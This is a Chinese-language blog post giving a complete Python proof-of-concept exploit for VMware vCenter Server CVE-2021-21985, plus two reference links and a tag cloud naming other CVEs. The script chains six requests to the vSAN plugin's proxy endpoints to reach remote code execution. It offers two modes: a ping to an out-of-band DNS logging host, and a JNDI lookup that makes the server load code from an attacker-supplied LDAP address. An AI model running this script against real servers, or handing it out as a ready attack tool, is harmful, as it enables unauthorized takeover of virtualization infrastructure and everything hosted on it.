vCenter Server CVE-2021-21985 POC

作者: print("") 分类: 信息安全 发布时间: 2021-06-18 14:12 

import requests
import json
import sys

#python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2

url = sys.argv[1]
dns = sys.argv[2]
exp = sys.argv[3]

header = {'Content-Type':'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}
cookie = {}
requests.packages.urllib3.disable_warnings()

def step1(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVsanServiceFactory/setTargetObject'
    data = {"methodInput":[None]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step1 success')
        step2(url,exp)
    else :
        print('step1 error')

def step2(url,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod'
    data = {"methodInput":["java.lang.ProcessImpl.start"]} if exp == 1  else {"methodInput":["javax.naming.InitialContext.doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step2 success')
        step3(url,exp)
    else :
        print('step2 error')

def step3(url,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod'
    data = {"methodInput":["start"]} if exp == 1 else {"methodInput":["doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step3 success')
        step4(url,dns,exp)
    else :
        print('step3 error')

def step4(url,dns,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'
    data = {"methodInput":[[["ping",dns],None,".",None,True]]} if exp == 1 else {"methodInput":[["ldap://"+dns+":1389/Exploit"]]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step4 success')
        step5(url)
    else :
        print('step4 error')

def step5(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step5 success')
        step6(url)
    else :
        print('step5 error')

def step6(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False,timeout=5)
    print('step6 success')

step1(url)

参考文章:https://mp.weixin.qq.com/s/KYG76IbR6PRs8PjrNDyVkQ

https://mp.weixin.qq.com/s/Hg67l1C-XWNzwFWF-CLh7A

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA